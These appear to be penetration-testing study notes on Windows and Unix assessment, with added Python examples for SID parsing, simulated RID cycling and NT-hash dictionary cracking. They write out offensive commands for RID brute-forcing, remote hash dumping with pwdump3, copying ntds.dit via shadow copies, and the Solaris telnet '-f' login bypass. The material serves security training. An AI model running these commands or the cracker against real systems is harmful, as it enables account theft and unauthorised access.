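Added example (not from these notes) for the SID structure just described: a parser that splits a SID into revision, identifier authority, domain (or local machine) identifier and RID, labels the RID against Microsoft's documented well-known values, and picks out administrative group SIDs from a list, which is what you need when reviewing token group memberships or security event log entries. The example SID is the one quoted above; the RID table holds documented Microsoft values only.

```python
"""Decomposing Windows SIDs into authority, domain identifier and RID.

Added example (not from the notes). The example SID is the one quoted above;
WELL_KNOWN_RIDS holds documented Microsoft domain-relative RIDs.
"""
import re
from typing import Dict, List

SID_RE = re.compile(r"^S-(\d+)-(\d+)((?:-\d+)+)$")

WELL_KNOWN_RIDS: Dict[int, str] = {
    500: "Administrator", 501: "Guest", 502: "krbtgt",
    512: "Domain Admins", 513: "Domain Users", 514: "Domain Guests",
    515: "Domain Computers", 516: "Domain Controllers", 518: "Schema Admins",
    519: "Enterprise Admins", 520: "Group Policy Creator Owners",
}
ADMIN_RIDS = {500, 512, 518, 519}


def parse_sid(sid: str) -> Dict:
    """S-<revision>-<authority>-<sub-authorities...>; for S-1-5-21-a-b-c-rid the
    three values after 21 identify the issuing domain or machine and the last is the RID."""
    m = SID_RE.match(sid.strip())
    if not m:
        raise ValueError(f"not a SID: {sid!r}")
    revision, authority = int(m.group(1)), int(m.group(2))
    subs = [int(x) for x in m.group(3).strip("-").split("-")]
    info = {"revision": revision, "authority": authority, "sub_authorities": subs,
            "domain_sid": None, "rid": subs[-1]}
    if authority == 5 and subs[:1] == [21] and len(subs) >= 4:
        info["domain_sid"] = "S-1-5-21-" + "-".join(map(str, subs[1:4]))
        info["rid"] = subs[4] if len(subs) >= 5 else None   # a bare domain SID has no RID
    return info


def describe_rid(rid: int) -> str:
    if rid in WELL_KNOWN_RIDS:
        return WELL_KNOWN_RIDS[rid]
    return "user-created principal" if rid >= 1000 else "reserved/well-known"


def same_domain(sid_a: str, sid_b: str) -> bool:
    """True when both SIDs were issued by the same domain or machine authority."""
    a, b = parse_sid(sid_a)["domain_sid"], parse_sid(sid_b)["domain_sid"]
    return a is not None and a == b


def privileged_domain_sids(sids: List[str]) -> List[str]:
    """SIDs whose RID is one of the built-in administrative accounts or groups."""
    return [s for s in sids if parse_sid(s)["rid"] in ADMIN_RIDS]


if __name__ == "__main__":
    example = "S-1-5-21-4064627337-2434140041-2375368561-1036"
    info = parse_sid(example)
    print(info["domain_sid"], info["rid"], describe_rid(info["rid"]))
```

Because a recreated account gets a fresh RID, as the notes say, comparing SIDs rather than names is what tells you whether an ACL entry or a log event refers to the account that exists today or to a deleted one.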
GetAcct can automate this username enumeration against a Windows 2003 domain controller. LSA brute forcing can be done anonymously against Windows 2000 and requires a guest account or better on other systems. This is not a brute-force technique in the common sense: it is a brute-forcing of users' RIDs. A user's RID is a value (generally 500, 501 or 1000+) that uniquely identifies a user on a domain or system. An LSA function is exposed which lets us convert the RID (say, 1000) to the username (say, "Ron").

Identifying key servers within the target domains
 Grab the list of domain controllers from the last step for each domain:
    nslookup -type=SRV _ldap._tcp.<domain>
 Attempt a zone transfer of the _msdcs zone and the AD zones.
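The SID structure and the RID cycling loop described above, as an added example (not code from the original notes). It parses a textual SID into its domain part and RID, converts it to and from the binary form returned by LSARPC and stored in the LDAP objectSid attribute, and then cycles RIDs against a LookupSids-style resolver. The directory behind the resolver is constructed here; the account names other than the well-known RIDs are invented.

```python
import struct

# Well-known RIDs that exist in every domain; these names are fixed by Windows.
WELL_KNOWN_RIDS = {500: "Administrator", 501: "Guest", 502: "krbtgt",
                   512: "Domain Admins", 513: "Domain Users"}


def parse_sid(sid: str):
    """Split 'S-1-5-21-...-1036' into (revision, identifier_authority, [sub_authorities])."""
    parts = sid.split("-")
    if len(parts) < 3 or parts[0] != "S":
        raise ValueError(f"not a SID: {sid!r}")
    return int(parts[1]), int(parts[2]), [int(p) for p in parts[3:]]


def split_domain_rid(sid: str):
    """Return (issuing domain/machine SID, RID): the last sub-authority is the RID."""
    revision, authority, subs = parse_sid(sid)
    if len(subs) < 2:
        raise ValueError(f"{sid!r} has no RID component")
    domain = "S-%d-%d-%s" % (revision, authority, "-".join(map(str, subs[:-1])))
    return domain, subs[-1]


def sid_to_bytes(sid: str) -> bytes:
    """Encode to the binary form used on the wire (LSARPC) and in LDAP objectSid:
    revision (1 byte) | sub-authority count (1) | identifier authority (6, big-endian) |
    sub-authorities (4 bytes each, little-endian)."""
    revision, authority, subs = parse_sid(sid)
    return (bytes([revision, len(subs)]) + authority.to_bytes(6, "big")
            + b"".join(struct.pack("<I", s) for s in subs))


def bytes_to_sid(raw: bytes) -> str:
    """Inverse of sid_to_bytes."""
    revision, count = raw[0], raw[1]
    authority = int.from_bytes(raw[2:8], "big")
    subs = struct.unpack("<%dI" % count, raw[8:8 + 4 * count])
    return "S-%d-%d-%s" % (revision, authority, "-".join(map(str, subs)))


def rid_cycle(domain_sid: str, lookup_sids, start: int = 500, stop: int = 1010):
    """Brute-force RIDs: ask the LookupSids-style callable about each candidate SID and
    keep the ones that resolve. `lookup_sids` takes one SID string and returns a name or None."""
    found = {}
    for rid in range(start, stop + 1):
        name = lookup_sids(f"{domain_sid}-{rid}")
        if name is not None:
            found[rid] = name
    return found


# Constructed stand-in for the directory behind LSARPC LookupSids (names other than the
# well-known ones are invented for the example).
DOMAIN_SID = "S-1-5-21-4064627337-2434140041-2375368561"
_FAKE_DIRECTORY = {f"{DOMAIN_SID}-{rid}": name for rid, name in WELL_KNOWN_RIDS.items()}
_FAKE_DIRECTORY.update({f"{DOMAIN_SID}-1000": "WEBSERV$", f"{DOMAIN_SID}-1003": "chris",
                        f"{DOMAIN_SID}-1007": "svc_backup"})


def fake_lookup_sids(sid: str):
    return _FAKE_DIRECTORY.get(sid)


if __name__ == "__main__":
    domain, rid = split_domain_rid("S-1-5-21-4064627337-2434140041-2375368561-1036")
    print(domain, rid)
    for rid, name in rid_cycle(domain, fake_lookup_sids).items():
        print(f"{rid:5d}  {name}")
```

Against a real target the `lookup_sids` callable would wrap rpcclient's lookupsids or an LSARPC client; the loop and the SID arithmetic are the same. Note the gap between the well-known RIDs (500-513) and the first created account at 1000: scanning well past the last hit is what catches accounts created after deletions.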
Identifying and analysing internal browse lists
  net view                          may show all computers in the network
  net view /domain                  shows the domains and workgroups in the environment
  net view /ALL /Domain:demo.com

View the users and groups of an AD security group:
  net group /domain TheGroupName
  net localgroup /domain
  net localgroup administrators
  net localgroup administrators /domain
  net group /domain
  net group "Domain Admins" /domain

Identifying and analysing accessible SMB shares
  net share

SYSVOL is an important component of Active Directory. The Sysvol folder is shared from an NTFS volume on all the domain controllers in a particular domain, and is used to deliver Group Policy and logon scripts to domain members. By default, SYSVOL includes two folders:
1. Policies (%SystemRoot%\Sysvol\Sysvol\domain_name\Policies) - the "shell" for each GPO is a folder stored under Policies (the Group Policy Template, GPT).
2. Scripts, also shared under the name NETLOGON (%SystemRoot%\Sysvol\Sysvol\domain_name\Scripts).
By default the SYSVOL share grants read-only access to Everyone, but the NTFS permissions on the SYSVOL folder (C:\Windows\SYSVOL by default) restrict read access to Authenticated Users. So, by default, only domain-authenticated users are granted read access to SYSVOL.

E2 - User Enumeration
Identifying user accounts on target systems and domains using NetBIOS, SNMP and LDAP.
https://gist.github.com/its-a-feature/1a34f597fb30985a2742bb16116e74e0
  net user                          shows local users
  net user /domain                  shows the list of users in the domain
  net user "account name" /domain   shows user details
  snmpwalk -c public -v1 192.168.1.1 1.3.6.1.4.1.77.1.2.25      (LanMgr user table)
  ldapsearch -x -H ldap://test.local -b DC=test,DC=local "(objectclass=user)"    (use objectclass=computer when enumerating computers)
  wmic useraccount get              enumerate all domain user accounts
Metasploit: auxiliary/scanner/smb/smb_lookupsid with SMBDomain=. MaxRID=10000 RHOSTS=<targets>, saving the output to domain_users.txt.
SNMP: Metasploit auxiliary/scanner/snmp/snmp_enumusers
E3 - Active Directory
Active Directory Roles (Global Catalogue, Master Browser, FSMO)
Some Active Directory operations must be performed by exactly one DC at a time (a single master), but the role can be transferred between DCs, so they are referred to as Flexible Single Master Operation (FSMO) roles. Currently in Windows there are five FSMO roles:
 Schema master
 Domain naming master
 RID master
 PDC emulator
 Infrastructure master
FSMO roles remove the need for the NT model of one PDC (primary domain controller) and many BDCs (backup domain controllers) by spreading these tasks among controllers.

The global catalogue is a distributed data repository that contains a searchable, partial representation of every object in every domain in a multi-domain Active Directory Domain Services (AD DS) forest. It is stored on domain controllers that have been designated as global catalogue servers and is distributed through multi-master replication. Searches directed to the global catalogue are faster because they do not involve referrals to different domain controllers.

The Master Browser is responsible for the browse list within its respective subnet and portion of the domain on that subnet. The Domain Master Browser collects information from each of the Master Browsers via the NetServerEnum API call, merges it with its own subnet's list, and so forms the enterprise-wide browse list for the domain. That merged list is then distributed back to the Master Browsers in each subnet so that the enterprise list is available to computers requesting services.

Reliance of AD on DNS and LDAP
Active Directory (AD) uses DNS as its locator service to support the various services that AD offers, such as Global Catalog (GC), Kerberos and Lightweight Directory Access Protocol (LDAP).
When you install Active Directory and the DNS Server role on your first domain controller in the domain, two forward lookup zones are created automatically. If your AD domain is ad.example.com, you will have a zone for ad.example.com and one for the subdomain _msdcs.ad.example.com. The _msdcs zone holds the records that client machines need to find domain controllers: records to locate AD sites, records for the different FSMO role holders, and only SRV (service) records registered by Microsoft-based services:
  Global Catalog service    _gc._tcp
  Domain controllers        _ldap._tcp      (domain controllers identified by LDAP)
  Kerberos authentication   _kerberos._tcp
The ad.example.com zone holds the records for client computers, member servers, and the A records for the domain controllers. Why is this zone important? So that workstations and servers can communicate with each other on the network. If this zone did not exist, you could probably log in, but you would not be able to do much else except browse the Internet.

The Lightweight Directory Access Protocol (LDAP) is a directory service protocol that runs above the TCP/IP stack. It provides a mechanism to connect to, search and modify Internet directories. You can query LDAP anonymously using ldp.exe; ldapsearch is a simple Unix-based alternative:
  ldapsearch -x -h 192.168.0.65
An attacker can launch a brute-force password guessing attack to compromise user accounts; the Unix bf_ldap tool is useful for this purpose.
Windows runs an LDAP service called the Global Catalog (GC) on TCP port 3268. The GC stores a logical representation of all the users, servers and devices within a Windows AD infrastructure. You can use the ldp.exe and ldapsearch utilities (along with a valid username and password) to enumerate users, servers, policies and other information; just point them at port 3268 instead of 389.

Group Policy (Local Security Policy)
  net accounts       list the account policy

E4 - Windows Passwords
Password policies (complexity, lockout policies)
Kerberos Golden Ticket
 If you have domain admin access (or equivalent rights on a domain controller) in an Active Directory forest/domain, you can forge Kerberos tickets to get unauthorised access.
 In AD, accounts sign in with a username and password and get back a Kerberos ticket-granting ticket (TGT) that carries their identity and group membership.
 Every TGT the domain issues is encrypted with the key of the KRBTGT account, a special disabled account that exists for this purpose. An attacker who can dump the KRBTGT password hash from a DC can therefore create a Golden Ticket.
 The Golden Ticket is a forged TGT, encrypted with the KRBTGT key, that claims whatever identity and group membership the attacker chooses. It is accepted by every DC in the domain and remains valid until the KRBTGT password has been changed twice, so it works as a persistent pass into any account.
Account Brute Forcing
Hash Storage (merits of LANMAN, NTLMv1 / v2)
 The LM hash (also known as the LanMan or LAN Manager hash) is a compromised password hashing function that was the primary hash used by Microsoft LAN Manager and Windows versions prior to Windows NT to store user passwords.
 The LM hashing algorithm is very old and is considered very insecure. Windows stored both LM and NTLM hashes by default until Windows Vista/Server 2008, from which point only NTLM hashes are stored (along with the empty LM hash AAD3B435B51404EEAAD3B435B51404EE).
 LANMAN hash construction:
   - Convert all lower case to UPPER CASE
   - Pad the password to 14 characters with NULL characters
   - Split the password into two 7-character chunks
   - Create a DES key from each 7-character chunk
   - DES-encrypt the string "KGS!@#$%" with each of the two keys
   - Concatenate the two DES outputs. That 16-byte string is the LANMAN hash stored in the SAM file.
Consequences:
1. Passwords are not case sensitive: everything is upper-cased before hashing, so password, PassWord, PaSsWoRd and PASSword all hash the same as PASSWORD.
2. Password characters are limited to a subset of 95 characters of the 256-value ASCII/OEM character set.
3. Password length is limited to a maximum of 14 characters.
4. A 14-character password is split into 7+7 characters and each half is hashed separately, so an attacker cracks two independent 7-character passwords rather than one 14-character one.
5. If the password is 7 characters or less, the second half always produces the same constant value (AAD3B435B51404EE). A password of 7 characters or fewer can therefore be identified by eye, without tools.
6. The hash is unsalted, so rainbow tables can be built once and reused, and the LM challenge/response derived from it on the network is weak enough to be replayed or cracked by a man-in-the-middle.
 NTLM (v1) and the NT hash are the successors to the LAN Manager (LANMAN) authentication protocol and hash. The NT hash algorithm is MD4(UTF-16-LE(password)).
 NTLM version 2 (NTLMv2), introduced in Windows NT 4.0 SP4 (and natively supported in Windows 2000), enhances NTLM security by hardening the protocol against many spoofing attacks and adding the ability for a server to authenticate to the client.
 NTLMv2 is the challenge/response protocol for performing Windows password authentication over the network. It is used whenever a password must be proven to a Windows or Samba server and the client is not part of a Windows Active Directory domain (or Kerberos is otherwise unavailable).
 The deeper problem is that NTLMv1 and NTLMv2 themselves provide no protection against credential forwarding/relay or reflection attacks; only SMB signing or channel binding layered on top of them do. An active attacker in the middle can therefore sometimes redirect a legitimate user's login to authenticate his own session.
 NTLM remains vulnerable to pass-the-hash: the NT hash alone is sufficient to authenticate, so no cracking is needed. The reflection variant (relaying a host's authentication back to itself) was addressed by Microsoft security update MS08-068; relay to other hosts still works wherever signing is not required.
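The NT hash construction (MD4 over the UTF-16-LE password) and the LM properties listed above, as an added example rather than code from the original notes. It implements MD4 in pure Python (hashlib's md4 is an OpenSSL legacy algorithm and is often unavailable), computes NT hashes, reads a pwdump-format dump, flags accounts whose LM hash reveals a short or still-stored legacy password, and runs a dictionary attack on the NT hashes. The sample dump is constructed: Administrator and legacy carry the commonly quoted LM/NT hashes of "password", Guest has the empty-password NT hash, and svc_backup's LM first half and NT hash are placeholder hex, not real hashes.

```python
import struct

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM hash of the empty/disabled password
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of the empty password


def _rol(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4: 64-byte blocks, three 16-step rounds, little-endian words."""
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", len(data) * 8)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    rounds = (
        (f, range(16), (3, 7, 11, 19), 0x00000000),
        (g, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13), 0x5A827999),
        (h, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15), 0x6ED9EBA1),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = state
        for fn, order, shifts, k in rounds:
            for n, idx in enumerate(order):
                a = _rol((a + fn(b, c, d) + x[idx] + k) & 0xFFFFFFFF, shifts[n % 4])
                a, b, c, d = d, a, b, c   # rotate registers so each step updates the next one
        state = [(s + v) & 0xFFFFFFFF for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> str:
    """NT hash = MD4(UTF-16-LE(password)); unsalted, exactly as stored in the SAM / ntds.dit."""
    return md4(password.encode("utf-16-le")).hex()


def analyse_pwdump(dump: str):
    """Parse pwdump-format lines (user:rid:lm:nt:::) and record what the LM hash gives away."""
    rows = []
    for line in dump.strip().splitlines():
        user, rid, lm, nt = line.split(":")[:4]
        lm, nt = lm.lower(), nt.lower()
        rows.append({
            "user": user, "rid": int(rid), "lm": lm, "nt": nt,
            "lm_present": lm != EMPTY_LM,                              # legacy hash still stored
            "lm_short": lm != EMPTY_LM and lm[16:] == EMPTY_LM[16:],   # empty 2nd half => <= 7 chars
            "nt_empty": nt == EMPTY_NT,                                # account has no password
        })
    return rows


def crack_nt(dump: str, wordlist):
    """Dictionary attack on the NT hashes: hash each candidate once, then match every account.
    Unsalted hashes are what make this one-hash-per-word lookup (and rainbow tables) possible."""
    table = {nt_hash(w): w for w in wordlist}
    table[EMPTY_NT] = ""
    return {r["user"]: table[r["nt"]] for r in analyse_pwdump(dump) if r["nt"] in table}


# Constructed sample dump (see the lead-in for which values are real hashes and which are placeholders).
SAMPLE_DUMP = """
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
legacy:1001:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
svc_backup:1002:0123456789abcdefaad3b435b51404ee:ffffffffffffffffffffffffffffffff:::
"""

if __name__ == "__main__":
    for row in analyse_pwdump(SAMPLE_DUMP):
        print(row["user"], "LM stored" if row["lm_present"] else "LM empty",
              "(<=7 chars)" if row["lm_short"] else "", "NO PASSWORD" if row["nt_empty"] else "")
    print(crack_nt(SAMPLE_DUMP, ["letmein", "Password1", "password"]))
```

The LM flags come straight from the properties above: a stored LM hash means the password is at most 14 characters and crackable as two 7-character halves, and an empty second half means it is 7 characters or fewer. The NT-side attack needs no LM hash at all; it only needs the hashes to be unsalted.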
 For example, Metasploit can in many cases be used to obtain credentials from one machine and use them to gain control of another.
 NTLM hash: generating the NTLM hash is far simpler than the LANMAN hash. It is simply MD4() of the password in Unicode (UTF-16-LE).
 Challenge/response: once the LANMAN and NTLM hashes have been calculated they cannot just be put on the wire; that would be vulnerable to any number of attacks, the most obvious being replay. Instead the server sends a challenge and the client proves knowledge of the hash by encrypting it.

Offline Password Analysis (rainbow tables / hash brute forcing)
 Distinguish between the SAM database on a standalone Windows system and the NTDS database on a domain controller. To further protect the password hashes, both are encrypted using a key (the boot key) stored in the SYSTEM registry hive (C:\Windows\System32\config\SYSTEM). This second encryption step is why a password dump for auditing needs a copy of both files. Domain hashes are stored in C:\Windows\NTDS\ntds.dit, which is locked because it is in constant use.
 Locations:
   %SystemRoot%\system32\config
   %SystemRoot%\repair (pre Windows XP backup copy)
   %SystemRoot%\NTDS\ntds.dit (Active Directory)
   from the registry (requires SYSTEM privileges)
 Windows Server 2008-2016: use ntdsutil to take an offline copy.
 Windows Server 2003: use Volume Shadow Copy:
   vssadmin list shadows                     check whether any shadow copies already exist
   vssadmin create shadow /for=C:            create a shadow copy, then copy ntds.dit and SYSTEM out of it
   vssadmin delete shadows /shadow=[GUID]    delete the shadow copy afterwards
 Cracking the hashes: John the Ripper; Cain & Abel is a Windows-based tool with a host of useful features including a password cracker. It is normally a good idea to break very weak passwords with a simple dictionary attack and a short (5 character) brute force first, then let rainbow tables pick up the rest.

E5 - Windows Vulnerabilities
Knowledge of remote Windows vulnerabilities, particularly those for which robust exploit code exists in the public domain.
MS17-010:
  nmap -Pn -p445 --open --max-hostgroup 3 --script smb-vuln-ms17-010 <ip_netblock>
Knowledge of local Windows privilege escalation vulnerabilities and techniques.
LLMNR, NBT-NS and DNS
Microsoft systems use Link-local Multicast Name Resolution (LLMNR) and the NetBIOS Name Service (NBT-NS) for local host resolution when DNS lookups fail. Apple Bonjour and Linux zero-configuration implementations use Multicast DNS (mDNS) to discover systems within a network. Because these are unauthenticated UDP broadcasts/multicasts, an attacker on the segment can answer them and direct users to a malicious service; the NTLMv2 responses captured this way are saved to disk and can then be cracked with John the Ripper.
Knowledge of common post-exploitation activities
 obtain password hashes, both from the local SAM and cached credentials
 obtain locally-stored clear-text passwords
 crack password hashes
Pwdump3 can authenticate remotely (against the ADMIN$ share) and then extract user password hashes from a Windows 2000 host:
  pwdump3 192.168.189.1 hashes.txt Administrator
  Please enter the password > secret
Two tools can be used to crack the Windows password hashes downloaded by Pwdump3:
 Cain & Abel - supports rainbow table cracking of NTLM hashes.
 John the Ripper - performs basic dictionary-based attacks.
 Reversion to previous state

E6 - Windows Patch Management Strategies
 Check patch levels - QFE (quick fix engineering):
  wmic qfe
 Derive a list of missing security patches: MBSA.
Knowledge of common Windows patch management strategies:
SMS - Microsoft Systems Management Server (SMS) 2003 provides a feature-rich management and servicing solution. You can use SMS 2003 or System Center Configuration Manager 2007 (ConfigMgr) to manage networked Windows Embedded Standard-based devices alongside Windows desktop, Windows Server and Windows Mobile systems.
SUS - Microsoft Software Update Services (SUS) is a free patch management tool provided by Microsoft to help network administrators deploy security patches more easily. In simple terms it is a version of Windows Update that you run on your own network: instead of each workstation connecting to the Internet to update Windows, each workstation connects to the SUS server and updates from there.
WSUS - Windows Server Update Services (WSUS), the successor to SUS, enables IT administrators to deploy the latest Microsoft product updates.
MBSA - Microsoft Baseline Security Analyzer (MBSA) helps you stay on top of regular network auditing tasks by scanning both local and remote Microsoft systems for common security misconfigurations. It can also identify missing security updates and service packs available through the various Microsoft Update technologies, helping to ensure all machines are patched correctly.

E7 - Desktop Lockdown
Knowledge and understanding of techniques to break out of a locked-down Windows desktop / Citrix environment.
 Dialog boxes - Notepad, File > Save As; Print. These give access to drives, which can be used as a pivot to create new files (batch files, shortcuts), open new Windows Explorer instances, and explore context menus (Open File Location).
 Help menus - similar to the above, but some contain a "click here to open Command Prompt" link, or a URL link that opens IE, from which you can pivot (see below).
 Environment variables / bypassing path restrictions - use a variable rather than a literal location, e.g. %SYSTEMROOT%\system32 instead of C:\Windows\system32.
 IE - file protocol handlers (about:, file:, mailto:), UNC paths such as \\127.0.0.1\c$\Windows\System32, the address bar, menus, right-click within a page, setting the home page to cmd.exe, F12 Developer Tools.
 Getting a command prompt - is Run available? Try Windows+R. Browse to cmd.exe, right-click and open; drag and drop a file with an invalid extension onto an executable; set the custom "view source" application to cmd.exe; import a certificate (abusing the dialog boxes).
 Microsoft Office applications - CTRL+click on a hyperlink such as file:///c:/Windows/System32/cmd.exe. It is trivial to use msfencode/msfpayload to generate VBA code that creates a reverse shell / Meterpreter shell on the host, and VBA can be used to open CMD.
 MS SQL - xp_cmdshell
 Task Manager - File > New Task (Run)
 Task Scheduler, MSPAINT, FTP client (lcd and !dir run local commands)
 Rundll32 - a vast array of commands can be run via Rundll32, e.g. Date and Time Properties: RunDll32.exe shell32.dll,Control_RunDLL timedate.cpl
 Shortcuts - standard shortcuts may be useful: WINDOWS+E launches Windows Explorer, WINDOWS+R Run, F3 Search, CTRL+O Open File, CTRL+S Save, CTRL+N New.
 Batch files and scripts - .BAT and .CMD files can be an alternative for executing system commands when an interactive shell is not permitted. While .BAT files may be blocked, the lesser-known .CMD equivalent is sometimes still allowed. Windows Script Host (WSH): create a .vbs file to launch a CMD shell.
 ICA files - modify the ICA file so that InitialProgram=cmd.exe
 Citrix - email, clipboard. Cached connection information may be available in local application data stores: look for the "ICAClient" directory, usually found within %APPDATA% (dir /s ICAClient from a command line also finds it). By copying another user's ICAClient contents into your own folder it may be possible to hijack their stored connections.
 Citrix shortcuts - SHIFT+F1 displays the Windows task list.
 As for privilege escalation: binary planting, DLL hijacking.

Privilege escalation techniques
 Depends on from what to what: admin to SYSTEM? Admin to Domain Admin? User to admin?
 Clear-text credentials in files - install and config files such as unattend.txt, sysprep.inf, sysprep.xml, vnc.ini, cached FTP credentials: findstr /si password *.txt *.xml *.ini
 Passwords in the registry - autologon, SNMP, PuTTY sessions.
 Directory permissions - incorrect permissions, often under Program Files, on directories of processes running as SYSTEM.
 Default permissions on newly created files.
 Autoruns - the Sysinternals tool highlights start-up executable locations; these files can be trojaned if writable. If the binary itself cannot be overwritten, check whether its directory is.
 DLLs - even when the binary is protected, a DLL can often be dropped into its directory and will be loaded as part of the binary (the loader looks in the application's own folder before system32). Use Process Monitor to trace which DLLs are looked for.
 Scheduled tasks - the at job list is admin-only, but a normal user can still see which scheduled tasks are running and look for writable targets.
 Services - orphaned installs; hijack them (Autoruns from Sysinternals helps find them).
 Token impersonation
 Named pipe impersonation
 Internet Explorer / Java escalation

E8 - Exchange
Knowledge of common attack vectors for Microsoft Exchange Server.
 OWA
 Choose your certificates carefully
 Utilise the power of the Edge Transport server
 Keep administrative access internal

E9 - Common Windows Applications
Knowledge of significant vulnerabilities in common Windows applications for which there is public exploit code available.
MS17-010 - EternalBlue
Appendix F: Unix Security Assessment
F1 - User enumeration
Discovery of valid usernames from network services commonly running by default:
 rusers - an RPC service that listens on a dynamically assigned port. If TCP/UDP 111 is open, the rpcinfo client can check for the presence of rusersd:
    rpcinfo -p 192.168.0.10
    program vers proto   port  service
    100002    3  tcp   33180  rusersd
  Once found, use rusers to retrieve the list of logged-in users:
    rusers -l 192.168.0.50
 rwho - UDP 513. rwho 192.168.189.120 lists the currently logged-in users.
 SMTP - valid user account details can be enumerated by issuing VRFY, EXPN or RCPT TO, and the accounts then brute-forced:
    telnet host 25
    HELO world
    VRFY test
    VRFY chris
  EXPN asks the server for the membership of a mailing list. VRFY asks the server to verify an address. RCPT TO adds one address to the list of envelope recipients; the server's accept/reject response (or a later bounce) can be used to deduce live accounts.
 Finger - TCP 79. Connect directly or via the finger command. Solaris 8 and below have an information leak that lists every account:
    finger '1 2 3 4 5 6 7 8 9 0'@192.168.0.10
    finger 'a b c d e f g h'@target.com
  Finger works by querying entries in the passwd file, i.e. the GECOS fields. It can also be used to query ".plan" files, which users create to inform others of their current activity, humour or anything else they wish to share:
    finger user@192.168.0.10
  Finger redirection (query 192.168.0.10 through the finger daemon on 217.34.17.200):
    finger @192.168.0.10@217.34.17.200

F2 - Unix vulnerabilities
Recent or commonly-found Solaris vulnerabilities, in particular those for which there is exploit code in the public domain.
Solaris 10 and 11 are affected by the telnet "-f" login bypass: if an existing account name is supplied after "-f" as the login name (e.g. bin), the telnet daemon passes it through to login as an "already authenticated" flag and no password is requested. It can be exploited from the command line with:
    telnet -l "-f<account>" <host>
Recent or commonly-found Linux vulnerabilities, in particular those for which there is exploit code in the public domain.
Use of remote exploit code and local exploit code to gain root access to the target host.
Common post-exploitation activities
 exfiltrate password hashes
 crack password hashes
 check patch levels
 derive a list of missing security patches
 reversion to previous state

F3 - FTP
FTP access control
You can use the following configuration files in the /etc/ftpd directory to control access to the FTP server:
 ftpusers lists users who are denied access to the FTP server.
 ftphosts allows or denies login from various hosts to various accounts on the FTP server.
 ftpaccess is the main FTP configuration file. The FTP server only reads /etc/ftpd/ftpaccess if called with the -a option. When the ftpaccess file is used, all users must be members of a class to be allowed access, and many ftpaccess directives can be applied only to a particular class.
Anonymous access to FTP servers
Risks of allowing write access to anonymous users.

F4 - Sendmail / SMTP
Valid username discovery via EXPN and VRFY.
Note the order of the SMTP dialogue: HELO > MAIL FROM: > RCPT TO:
Awareness of recent Sendmail vulnerabilities; ability to exploit them if possible.
Mail relay vulnerability
Mail relaying

F5 - Network File System (NFS)
NFS security: host level (exports restricted to particular hosts) and file level (by UID and GID).
 The /etc/exports file controls which file systems are exported to remote hosts and specifies options.
 An alternative way to mount an NFS share from another machine (as opposed to using the mount command) is to add a line to /etc/fstab.
Use of NFSv4 is recommended over other versions of NFS. NFSv4 security mechanisms are oriented towards authenticating individual users, rather than client machines as in NFSv2 and NFSv3.
The NFS service runs on port 2049 (TCP and UDP). The rpcinfo utility can be used to determine whether mountd and NFS services are running on the host.
Access control is not possible for users other than through file and directory permissions. In other words, once a file system is exported via NFS, any user on any remote host connected to the NFS server can access the shared data. To limit the potential risks, administrators often allow read-only access or squash user permissions to a common user and group ID.
Wildcards should be used sparingly when exporting directories via NFS, as the scope of a wildcard can encompass more systems than intended.
Mount access is achieved by the client machine attempting to attach to the server. The security for this is provided by the /etc/exports file, which lists the names or IP addresses of machines that are allowed to access a share point. If the client's IP address matches one of the entries in the access list it is allowed to mount. It is also possible to restrict access to the portmap service via TCP wrappers, and access to the ports used by portmap, rpc.mountd and rpc.nfsd can be limited with iptables firewall rules.
The following command retrieves the list of exported folders for a given host:
    showmount -e <host>
If there are files on the exported share that the user does not have permission to read, it may be possible to trick the NFS server into believing that the account trying to read the file is its owner. This is achieved by UID (user ID) manipulation: use ls -la to get the owner UID of the file, create a local user with the same name and UID (the UID can be set in the passwd file), then su to the new user and access the file. Since the UID of the file matches the UID of the new user, the server believes this is the original owner and the contents can be read.

Root squashing
The default behaviour when exporting a file system via NFS is root squashing: anyone accessing the share as root on their local machine is mapped to the server's nfsnobody account. Never turn off root squashing; it prevents someone with local root from changing file permissions on the remote share.
The UID trick above works for any non-root owner regardless of squashing. Acting as root on the share only works when the exported folder does not have root_squash set (i.e. is exported with no_root_squash), because root_squash maps UID/GID 0 of the accessing user to the anonymous UID/GID: the root user of a host accessing the share is replaced by the user nobody on the NFS server to prevent escalation of privileges. The root_squash option is enabled or disabled in /etc/exports (vi /etc/exports).

nosuid and noexec options
Can be used in /etc/fstab:
  noexec - prevents execution of binaries on the mounted file system. This is useful if the system is mounting a non-Linux file system via NFS containing incompatible binaries.
  nosuid - disables set-user-identifier and set-group-identifier bits. This prevents remote users from gaining higher privileges by running a setuid program.

File access through UID and GID manipulation
Mount the remote file system and ls -la what you want to know. Unmount the file system, create the group and user locally with the same IDs, su to that user, remount the file system, and you have access to all the things.
If the passwd file has write permissions, changing the UID of a non-privileged user to 0 gives it root-level access (in the demonstration the UID of the user "service" was set to 0, the UID of root).

F6 - R* services
Berkeley r* services:
 Access control (/etc/hosts.equiv and .rhosts): /etc/hosts.equiv is system-wide and applies to everyone, while ~/.rhosts is specific to the user (and is stored in their home directory).
 Trust relationships: when a user connects, the client IP address is cross-referenced against .rhosts and the username is verified, but no password is needed.
